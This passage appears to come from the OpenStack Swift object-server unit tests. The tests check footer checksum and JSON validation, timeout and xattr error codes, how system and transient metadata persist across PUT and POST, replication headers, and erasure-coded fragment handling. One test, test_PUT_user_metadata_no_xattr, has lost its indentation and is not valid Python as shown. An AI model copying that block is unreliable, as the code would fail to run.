        # a subsequent HEAD must report the footer values
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp},
            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.headers.get('X-Object-Meta-X'), 'Y')
        self.assertEqual(resp.headers.get('X-Object-Sysmeta-X'), 'Y')
    def test_PUT_missing_footer_checksum(self):
        # A footer document without its Content-MD5 integrity header is
        # rejected as a bad request (400).
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            # no Content-MD5
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_PUT_bad_footer_checksum(self):
        # A footer whose Content-MD5 does not match the footer bytes is
        # rejected with 422 (unprocessable).
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
        # checksum of different bytes than the footer actually sent
        bad_footer_meta_cksum = md5(footer_meta + "bad").hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            "Content-MD5: " + bad_footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 422)
    def test_PUT_bad_footer_json(self):
        # A footer that passes its MD5 check but is not valid JSON is
        # rejected as a bad request (400).
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        footer_meta = "{{{[[{{[{[[{[{[[{{{[{{{{[[{{[{["
        # the checksum is correct for these bytes; only the JSON is bad
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_PUT_extra_mime_docs_ignored(self):
        # MIME documents after the footer are ignored, but the server
        # still consumes the whole request body off the wire.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        footer_meta = json.dumps({'X-Object-Meta-Mint': 'pepper'})
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary",
            "This-Document-Is-Useless: yes",
            "",
            "blah blah I take up space",
            "--boundary--"
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # swob made this into a StringIO for us
        wsgi_input = req.environ['wsgi.input']
        # the read position must be at EOF: nothing left unconsumed
        self.assertEqual(wsgi_input.tell(), len(wsgi_input.getvalue()))
def test_PUT_user_metadata_no_xattr(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY THREE'
def mock_get_and_setxattr(*args, **kargs):
error_num = errno.ENOTSUP if hasattr(errno, 'ENOTSUP') else \
errno.EOPNOTSUPP
raise IOError(error_num, 'Operation not supported')
with mock.patch('xattr.getxattr', mock_get_and_setxattr):
with mock.patch('xattr.setxattr', mock_get_and_setxattr):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
    def test_PUT_client_timeout(self):
        """A ChunkReadTimeout while reading the PUT body maps to 408."""
        class FakeTimeout(BaseException):
            # Raises itself on entry so the server's timeout context
            # fires immediately, without any actual waiting.
            def __enter__(self):
                raise self
            def __exit__(self, typ, value, tb):
                pass
        # This is just so the test fails when run on older object server code
        # instead of exploding.
        if not hasattr(object_server, 'ChunkReadTimeout'):
            object_server.ChunkReadTimeout = None
        with mock.patch.object(object_server, 'ChunkReadTimeout', FakeTimeout):
            timestamp = normalize_timestamp(time())
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                headers={'X-Timestamp': timestamp,
                         'Content-Type': 'text/plain',
                         'Content-Length': '6'})
            req.environ['wsgi.input'] = WsgiBytesIO(b'VERIFY')
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 408)
    def test_PUT_system_metadata(self):
        # check that sysmeta is stored in diskfile
        """User meta, sysmeta and transient sysmeta sent on a PUT are all
        persisted in the .data file's on-disk metadata."""
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Sysmeta-1': 'One',
                     'X-Object-Sysmeta-Two': 'Two',
                     'X-Object-Transient-Sysmeta-Foo': 'Bar'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Inspect the .data file directly on disk.
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp,
                          'Content-Length': '14',
                          'Content-Type': 'text/plain',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'One',
                          'X-Object-Sysmeta-1': 'One',
                          'X-Object-Sysmeta-Two': 'Two',
                          'X-Object-Transient-Sysmeta-Foo': 'Bar'})
    def test_PUT_succeeds_with_later_POST(self):
        """A PUT whose timestamp is older than an existing .meta file
        still succeeds, and both the .data and the newer .meta survive."""
        t_put = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': t_put,
                                     'Content-Length': 0,
                                     'Content-Type': 'plain/text'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Deliberately draw t_put2 BEFORE t_post so that the second PUT
        # (sent after the POST) carries an older timestamp than the .meta.
        t_put2 = next(self.ts).internal
        t_post = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers={'X-Timestamp': t_post})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': t_put2,
                                     'Content-Length': 0,
                                     'Content-Type': 'plain/text'},
                            )
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Both the newer .data and the even-newer .meta must exist on disk.
        obj_dir = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')))
        ts_file = os.path.join(obj_dir, t_put2 + '.data')
        self.assertTrue(os.path.isfile(ts_file))
        meta_file = os.path.join(obj_dir, t_post + '.meta')
        self.assertTrue(os.path.isfile(meta_file))
    def test_POST_system_metadata(self):
        # check that diskfile sysmeta is not changed by a POST
        """POST updates user metadata in a new .meta file but must not
        alter sysmeta stored in the original .data file."""
        timestamp1 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Sysmeta-1': 'One',
                     'X-Object-Sysmeta-Two': 'Two'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # POST tries (and must fail) to overwrite the sysmeta values.
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'X-Object-Meta-1': 'Not One',
                     'X-Object-Sysmeta-1': 'Not One',
                     'X-Object-Sysmeta-Two': 'Not Two'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # original .data file metadata should be unchanged
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp1 + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp1,
                          'Content-Length': '14',
                          'Content-Type': 'text/plain',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'One',
                          'X-Object-Sysmeta-1': 'One',
                          'X-Object-Sysmeta-Two': 'Two'})
        # .meta file metadata should have only user meta items
        metafile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp2 + '.meta')
        self.assertTrue(os.path.isfile(metafile))
        self.assertEqual(diskfile.read_metadata(metafile),
                         {'X-Timestamp': timestamp2,
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'Not One'})
    def test_POST_then_fetch_content_type(self):
        # check that content_type is updated by a POST
        """Content-Type sent with a POST is stored in the .meta file and
        served on subsequent HEAD/GET; the .data file stays unchanged."""
        timestamp1 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-1': 'One'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'X-Object-Meta-1': 'Not One',
                     'Content-Type': 'text/html'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # original .data file metadata should be unchanged
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp1 + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp1,
                          'Content-Length': '14',
                          'Content-Type': 'text/plain',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'One'})
        # .meta file metadata should have updated content-type
        # (the filename encodes both the meta and content-type timestamps)
        metafile_name = encode_timestamps(Timestamp(timestamp2),
                                          Timestamp(timestamp2),
                                          explicit=True)
        metafile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            metafile_name + '.meta')
        self.assertTrue(os.path.isfile(metafile))
        self.assertEqual(diskfile.read_metadata(metafile),
                         {'X-Timestamp': timestamp2,
                          'name': '/a/c/o',
                          'Content-Type': 'text/html',
                          'Content-Type-Timestamp': timestamp2,
                          'X-Object-Meta-1': 'Not One'})
        def check_response(resp):
            # Served headers must reflect the POSTed content-type/meta.
            self.assertEqual(resp.status_int, 200)
            self.assertEqual(resp.content_length, 14)
            self.assertEqual(resp.content_type, 'text/html')
            self.assertEqual(resp.headers['content-type'], 'text/html')
            self.assertEqual(
                resp.headers['last-modified'],
                strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(math.ceil(float(timestamp2)))))
            self.assertEqual(resp.headers['etag'],
                             '"1000d172764c9dbc3a5798a67ec5bb76"')
            self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
    def test_POST_transient_sysmeta(self):
        # check that diskfile transient system meta is changed by a POST
        """Unlike real sysmeta, transient sysmeta IS updatable via POST:
        the new value lands in the .meta file, the .data is untouched."""
        timestamp1 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Sysmeta-1': 'One',
                     'X-Object-Transient-Sysmeta-Foo': 'Bar'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'X-Object-Meta-1': 'Not One',
                     'X-Object-Sysmeta-1': 'Not One',
                     'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # original .data file metadata should be unchanged
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp1 + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY SYSMETA')
        self.assertDictEqual(diskfile.read_metadata(objfile),
                             {'X-Timestamp': timestamp1,
                              'Content-Length': '14',
                              'Content-Type': 'text/plain',
                              'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                              'name': '/a/c/o',
                              'X-Object-Meta-1': 'One',
                              'X-Object-Sysmeta-1': 'One',
                              'X-Object-Transient-Sysmeta-Foo': 'Bar'})
        # .meta file metadata should have only user meta items
        # (plus the updated transient sysmeta; plain sysmeta is excluded)
        metafile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp2 + '.meta')
        self.assertTrue(os.path.isfile(metafile))
        self.assertDictEqual(diskfile.read_metadata(metafile),
                             {'X-Timestamp': timestamp2,
                              'name': '/a/c/o',
                              'X-Object-Meta-1': 'Not One',
                              'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
    def test_PUT_then_fetch_system_metadata(self):
        """All metadata flavors stored on PUT are returned as headers by
        both HEAD and GET."""
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Sysmeta-1': 'One',
                     'X-Object-Sysmeta-Two': 'Two',
                     'X-Object-Transient-Sysmeta-Foo': 'Bar'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        def check_response(resp):
            # Same expectations for HEAD and GET responses.
            self.assertEqual(resp.status_int, 200)
            self.assertEqual(resp.content_length, 14)
            self.assertEqual(resp.content_type, 'text/plain')
            self.assertEqual(resp.headers['content-type'], 'text/plain')
            self.assertEqual(
                resp.headers['last-modified'],
                strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(math.ceil(float(timestamp)))))
            self.assertEqual(resp.headers['etag'],
                             '"1000d172764c9dbc3a5798a67ec5bb76"')
            self.assertEqual(resp.headers['x-object-meta-1'], 'One')
            self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
            self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
            self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
                             'Bar')
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
    def test_PUT_then_POST_then_fetch_system_metadata(self):
        """After a POST, HEAD/GET serve updated user meta and transient
        sysmeta, original sysmeta, and drop user/transient items that
        the POST did not resend."""
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'X-Object-Meta-0': 'deleted by post',
                     'X-Object-Sysmeta-0': 'Zero',
                     'X-Object-Transient-Sysmeta-0': 'deleted by post',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Sysmeta-1': 'One',
                     'X-Object-Sysmeta-Two': 'Two',
                     'X-Object-Transient-Sysmeta-Foo': 'Bar'})
        req.body = 'VERIFY SYSMETA'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # POST omits the *-0 items, so they must disappear from responses.
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': timestamp2,
                     'X-Object-Meta-1': 'Not One',
                     'X-Object-Sysmeta-1': 'Not One',
                     'X-Object-Sysmeta-Two': 'Not Two',
                     'X-Object-Transient-Sysmeta-Foo': 'Not Bar'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        def check_response(resp):
            # user meta should be updated but not sysmeta
            self.assertEqual(resp.status_int, 200)
            self.assertEqual(resp.content_length, 14)
            self.assertEqual(resp.content_type, 'text/plain')
            self.assertEqual(resp.headers['content-type'], 'text/plain')
            self.assertEqual(
                resp.headers['last-modified'],
                strftime('%a, %d %b %Y %H:%M:%S GMT',
                         gmtime(math.ceil(float(timestamp2)))))
            self.assertEqual(resp.headers['etag'],
                             '"1000d172764c9dbc3a5798a67ec5bb76"')
            self.assertEqual(resp.headers['x-object-meta-1'], 'Not One')
            self.assertEqual(resp.headers['x-object-sysmeta-0'], 'Zero')
            self.assertEqual(resp.headers['x-object-sysmeta-1'], 'One')
            self.assertEqual(resp.headers['x-object-sysmeta-two'], 'Two')
            self.assertEqual(resp.headers['x-object-transient-sysmeta-foo'],
                             'Not Bar')
            self.assertNotIn('x-object-meta-0', resp.headers)
            self.assertNotIn('x-object-transient-sysmeta-0', resp.headers)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'HEAD'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'GET'})
        resp = req.get_response(self.object_controller)
        check_response(resp)
    def test_PUT_with_replication_headers(self):
        # check that otherwise disallowed headers are accepted when specified
        # by X-Backend-Replication-Headers
        """Headers not in ``allowed_headers`` are dropped on a normal PUT
        but persisted when listed in X-Backend-Replication-Headers."""
        # first PUT object
        timestamp1 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Type': 'text/plain',
                     'Content-Length': '14',
                     'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'Custom-Header': 'custom1',
                     'X-Object-Meta-1': 'meta1',
                     'X-Static-Large-Object': 'False'})
        req.body = 'VERIFY SYSMETA'
        # restrict set of allowed headers on this server
        with mock.patch.object(self.object_controller, 'allowed_headers',
                               ['Custom-Header']):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp1 + '.data')
        # X-Static-Large-Object is disallowed.
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp1,
                          'Content-Type': 'text/plain',
                          'Content-Length': '14',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'Custom-Header': 'custom1',
                          'X-Object-Meta-1': 'meta1'})
        # PUT object again with X-Backend-Replication-Headers
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Type': 'text/plain',
                     'Content-Length': '14',
                     'Etag': '1000d172764c9dbc3a5798a67ec5bb76',
                     'Custom-Header': 'custom1',
                     'X-Object-Meta-1': 'meta1',
                     'X-Static-Large-Object': 'False',
                     'X-Backend-Replication-Headers':
                     'X-Static-Large-Object'})
        req.body = 'VERIFY SYSMETA'
        with mock.patch.object(self.object_controller, 'allowed_headers',
                               ['Custom-Header']):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(0), 'p',
                              hash_path('a', 'c', 'o')),
            timestamp2 + '.data')
        # X-Static-Large-Object should be copied since it is now allowed by
        # replication headers.
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': timestamp2,
                          'Content-Type': 'text/plain',
                          'Content-Length': '14',
                          'ETag': '1000d172764c9dbc3a5798a67ec5bb76',
                          'name': '/a/c/o',
                          'Custom-Header': 'custom1',
                          'X-Object-Meta-1': 'meta1',
                          'X-Static-Large-Object': 'False'})
    def test_PUT_container_connection(self):
        """Container-update failures (500 response or a raised exception)
        must not fail the object PUT itself — all three cases return 201."""
        def mock_http_connect(response, with_exc=False):
            # Returns a factory producing a canned container-server
            # connection with the given status; optionally raises on
            # getresponse() to simulate a connection error.
            class FakeConn(object):
                def __init__(self, status, with_exc):
                    self.status = status
                    self.reason = 'Fake'
                    self.host = '1.2.3.4'
                    self.port = '1234'
                    self.with_exc = with_exc
                def getresponse(self):
                    if self.with_exc:
                        raise Exception('test')
                    return self
                def read(self, amt=None):
                    return ''
            return lambda *args, **kwargs: FakeConn(response, with_exc)
        # Case 1: container update succeeds (201).
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1',
                     'Content-Length': '0'})
        with mock.patch.object(
                object_server, 'http_connect', mock_http_connect(201)):
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Case 2: container update returns 500 — PUT still succeeds.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1',
                     'Content-Length': '0'})
        with mock.patch.object(
                object_server, 'http_connect', mock_http_connect(500)):
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Case 3: container connection raises — PUT still succeeds.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'X-Container-Host': '1.2.3.4:0',
                     'X-Container-Partition': '3',
                     'X-Container-Device': 'sda1',
                     'X-Container-Timestamp': '1',
                     'Content-Type': 'application/new1',
                     'Content-Length': '0'})
        with mock.patch.object(
                object_server, 'http_connect',
                mock_http_connect(500, with_exc=True)):
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
    def test_EC_GET_PUT_data(self):
        """For each EC policy, a stored fragment archive is returned
        byte-for-byte by a subsequent GET."""
        for policy in self.ec_policies:
            # Truncate so the payload is not an exact segment multiple.
            raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
            frag_archives = encode_frag_archive_bodies(policy, raw_data)
            # Any fragment index should round-trip the same way.
            frag_index = random.randint(0, len(frag_archives) - 1)
            # put EC frag archive
            req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
                'X-Timestamp': next(self.ts).internal,
                'Content-Type': 'application/verify',
                'Content-Length': len(frag_archives[frag_index]),
                'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
                'X-Backend-Storage-Policy-Index': int(policy),
            })
            req.body = frag_archives[frag_index]
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            # get EC frag archive
            req = Request.blank('/sda1/p/a/c/o', headers={
                'X-Backend-Storage-Policy-Index': int(policy),
            })
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            self.assertEqual(resp.body, frag_archives[frag_index])
    def test_EC_GET_quarantine_invalid_frag_archive(self):
        """Reading a corrupt EC fragment raises DiskFileQuarantined while
        streaming the body, and the object is quarantined (later 404)."""
        policy = random.choice(self.ec_policies)
        raw_data = ('VERIFY' * policy.ec_segment_size)[:-432]
        frag_archives = encode_frag_archive_bodies(policy, raw_data)
        frag_index = random.randint(0, len(frag_archives) - 1)
        content_length = len(frag_archives[frag_index])
        # put EC frag archive
        req = Request.blank('/sda1/p/a/c/o', method='PUT', headers={
            'X-Timestamp': next(self.ts).internal,
            'Content-Type': 'application/verify',
            'Content-Length': content_length,
            'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
            'X-Backend-Storage-Policy-Index': int(policy),
        })
        # Corrupt the archive but keep its declared length.
        corrupt = 'garbage' + frag_archives[frag_index]
        req.body = corrupt[:content_length]
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # get EC frag archive
        req = Request.blank('/sda1/p/a/c/o', headers={
            'X-Backend-Storage-Policy-Index': int(policy),
        })
        resp = req.get_response(self.object_controller)
        # Headers are fine (200); corruption only surfaces on body read.
        self.assertEqual(resp.status_int, 200)
        with self.assertRaises(DiskFileQuarantined) as ctx:
            resp.body
        self.assertIn("Invalid EC metadata", str(ctx.exception))
        # nothing is logged on *our* loggers
        errors = self.object_controller.logger.get_lines_for_level('error')
        self.assertEqual(errors, [])
        # get EC frag archive - it's gone
        req = Request.blank('/sda1/p/a/c/o', headers={
            'X-Backend-Storage-Policy-Index': int(policy),
        })
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    def test_PUT_ssync_multi_frag(self):
        """Same-timestamp PUTs of different EC fragments: conflicting
        frag indexes 409 unless X-Backend-Ssync-Frag-Index allows them."""
        timestamp = utils.Timestamp(time()).internal
        def put_with_index(expected_rsp, frag_index, node_index=None):
            # Issue one PUT with the given EC frag index (and optional
            # ssync node index) and assert the expected status; on
            # success also verify the fragment's .data file exists.
            data_file_tail = '#%d#d.data' % frag_index
            headers = {'X-Timestamp': timestamp,
                       'Content-Length': '6',
                       'Content-Type': 'application/octet-stream',
                       'X-Backend-Ssync-Frag-Index': node_index,
                       'X-Object-Sysmeta-Ec-Frag-Index': frag_index,
                       'X-Backend-Storage-Policy-Index': int(policy)}
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                headers=headers)
            req.body = 'VERIFY'
            resp = req.get_response(self.object_controller)
            self.assertEqual(
                resp.status_int, expected_rsp,
                'got %s != %s for frag_index=%s node_index=%s' % (
                    resp.status_int, expected_rsp,
                    frag_index, node_index))
            if expected_rsp == 409:
                return
            obj_dir = os.path.join(
                self.testdir, 'sda1',
